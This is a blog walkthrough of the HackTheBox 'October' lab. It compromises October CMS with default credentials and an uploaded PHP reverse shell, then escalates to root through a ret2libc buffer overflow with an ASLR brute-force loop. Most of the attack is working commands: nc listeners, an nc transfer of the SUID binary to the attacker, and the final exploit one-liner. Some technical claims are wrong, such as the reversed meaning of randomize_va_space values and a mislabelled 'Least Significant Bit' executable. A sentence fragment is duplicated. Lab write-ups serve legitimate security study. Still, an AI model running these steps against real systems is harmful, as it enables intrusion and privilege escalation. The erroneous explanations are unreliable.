August 3rd 2019

Hello Friends, Here I come with one of the most interesting topics for hackers, guess what – Buffer overflow and ASLR brute forcing to get a root Shell. To perform that I got a great box (machine) from HackTheBox called October. I know this is a very old machine and got lot of walkthroughs – but I felt like most of them are hard to understand for beginners. So, here is a HackTheBox October Walkthrough which deals with October CMS and then we try to make a way to get a shell on the machine (which would be a limited shell) and through little bit of enumeration you get a weird file with SUID permissions (which can run root permissions- to put it in simple terms). We need to perform a buffer overflow exploitation on that to get a root shell.

This is my very first HackTheBox walkthrough. I thought of starting with something interesting box. So, here is its October Walk through. As usual we are gonna start with simple Reconnaissance with nmap and dirb. The first i do when I start to crack a machine is to check the services that are running on the machine and proceed according to it.

nmap -sS -sV -A -o oct.nmap 10.10.10.16

# Nmap 7.70 scan initiated Sat Jul 27 17:51:10 2019 as: nmap -sS -sV -A -o oct.nmap 10.10.10.16
Nmap scan report for 10.10.10.16
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   297.95 ms 10.10.14.1
2   298.12 ms 10.10.10.16

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 27 17:51:50 2019 -- 1 IP address (1 host up) scanned in 41.50 seconds

port 80 is running on this machine, lets go and check it out. Here we can find the October cms running.

When search about October CMS, I found that the default login page is http://10.10.10.16/backend. lets go to http://10.10.10.16/backend and try logging in with a simple guess of “admin/admin” and its logged in.

when reading about October cms exploits, I found many vulnerabilities at exploit-db.com https://www.exploit-db.com/exploits/41936go through this for reference. There is a very useful vulnerability for us – which allows us to upload any php files but only php5 files. We can create a php reverse shell and get a user shell on our machine. i Prefer the PHP reverse shell from Pentester Money, you can download it and edit it.

You need to change the IP address to your IP address and port accordingly.

As per the exploit-db.com vulnerabilities, October CMS takes only .php5 files as input in the Image section. So, rename PHP to PHP5.

Go to Media --> upload

Select the edited PHP-reverse-shell.php5 file

As we are going to establish a reverse shell, Lets start netcat listening

nc -nvlp 9001

Run the reverse sell to get a user shell on netcat listening terminal

What we got is a complete limited shell, so to get an interactive shell, use python pty.

python -c 'import pty;pty.spawn("/bin/bash")'

Go to /home directory and you can find a user named harry, you can find user.txt in harry directory.

After a little of enumeration, i tried to search for files with SUID permissions and found a weird file names ovrflw --> obviously name it self says over flow, by which we can think that this might lead into a buffer overflow and we can get a root shell by exploiting this.

\find / -perm -4000 2>/dev/null

Lets check the details of the file . we can see that ovrflw is a 32-bit Least Significant Bit executable.

file /usr/local/bin/ovrflw

As it is a executable, lets test it on our machine first, then we can exploit in our target machine. so lets transfer it using nc. i tried transferring it using python server, for some reason, that did not work.

nc -l -p 8003 > ovrflw              /on your kali

nc -w 5 YourIpAddress 8003

Exploit Development Phase:

Requirements:

GDB Debugger & Peda

apt-get install gdb

git clone https://github.com/longld/peda.git ~/peda

echo "source ~/peda/peda.py" >> ~/.gdbinit

After you are done installing those two binaries, we are good to go. Lets start debugging the ovrflw application.

To Run GDB

gdb ./ovrflw

To Check ASLR Status: we can see that ASLR is disabled on this application.

aslr

Lets check the main (Disassembling the main function) to see all the functions this application is using. I left pretty happy after seeing "strcpy" function, because i am not a pro in assembly and buffer overflow, but i know strcpy is vulnerable to buffer flow and know how to exploit it :).

pdisass main

Along with that i ran "checksec" to check which security protections are enabled on the application.

checksec

i will give a brief info about the NX and RELRO here, there is a lot of info available on internet about them.

NX BIT: The NX Bit (no-execute) is used to segregate areas of memory for use of processing instructions and storing data. NX bit may mark certain areas of memory as non-executable. The processor will then refuse to execute any code residing in these areas of memory.Executable space protection, is a technique used to prevent certain types of malicious software from taking over computers by inserting their code into another program's data storage area and running their own code from within this section, this is nothing but buffer over flow.

RELRO: Relocation Read-only:

RELRO is a mitigation technique used to harden the sections of an ELF binary/application/process. There are two modes in RELRO, partial and full. In Partial RELRO data sections (.data and .bss) are reordered so that they can come after the ELF internal data sections, exploitation is still possible in partial RELRO because GOT is still writable here. In Full RELRO it can mitigate the process of modifying the GOT entry to get control of the program. This is done by making the entire GOT as read-only.

So, in our case NX is enabled and RELRO is partial which can be exploitable as .got is writable.

Lets try over flowing our little binary. we can use pattern create to create some random data to pass it as an input to get a break point.

pattern create 150

Lets send the random garbage data as an input in gdb to find out where our EIP register is over written. we can see that 0x41384141 is our break point.

r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

Now we need to find the pattern offset, so that we can find after how many characters our application/binary is breaking. we need to check the offset of the EIP register that is 0x41384141. We found that binary break point is after 112 characters.

pattern_offset 0x41384141

If you want to find the EBP and EIP values, you can use the command

pattern_search

OK, Everything is good till now. Lets shift to the target machine and develop our exploit. we need few things to get a shell, the main part is the address of "/bin/sh" and "system". Also, we need exit address as well.

we need to point our "/bin/sh" address to "system" so that we can get a shell. Lets start with finding the system address. system address is 0xb759c310

p system

To find the address of "/bin/sh" add some value to the "system" and add it with find command. 0x76bebac is our "/bin/sh" address

find 0xb759c310, +9999999, "/bin/sh"

Lets confirm the address of "bin/sh" in gdb using the following command

x/s 0xb76bebac

In the same way find the address of "exit" as well. Exit Address is "0xb758f260"

p exit

Here comes the main part, ASLR on target machine is active, you can check this by

cat /proc/sys/kernel/randomize_va_space

if the output is "0" then ASLR is enabled, here it is active

if the output is "2", then ASLR is disabled.

ASLR randomizes the offset location of the memory. So, we need to brute force all the possible addresses and find the exact one. we need to make an exploit with all 4 values we got.

A * 112          offset
0xb759c310  system
0xb758f260  exit
0xb76bebac       /bin/sh

ll the possible addresses and find the exact one. we need to make an exploit with all 4 values we got. order to make the exploit is offset A*112 + System + Exit + /bin/sh.

so the final exploit is

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xc3\x59\xb7\x60\xf2\x58\xb7\xac\xeb\x6b\xb7"'); done

It Might take a maximum of 5 mins to brute force and get the shell, wait for it.

That's it here is the root and root.txt Enjoy !!!!!!!

================== HACKING DREAM ===================

Main Principle of My Hacking Dream is to Promote Hacking Tricks and Tips to All the People in the World, So That Everyone will be Aware of Hacking and protect themselves from Getting Hacked. Hacking Don’t Need Agreements.

I Will Be Very Happy To Help You, So For Queries or Any Problem Comment Below or You Can Mail Me At [email protected]

Best 100 Beaches Ranking List
Discover the Top Must-Have Accessorie…
Shell posts $6.2 billion third-quarte…
Hardening Ubuntu Pro 22.04 with CIS B…
Fluoride use in Dental Care

This post first appeared on Hacking Dream, please read the originial post: here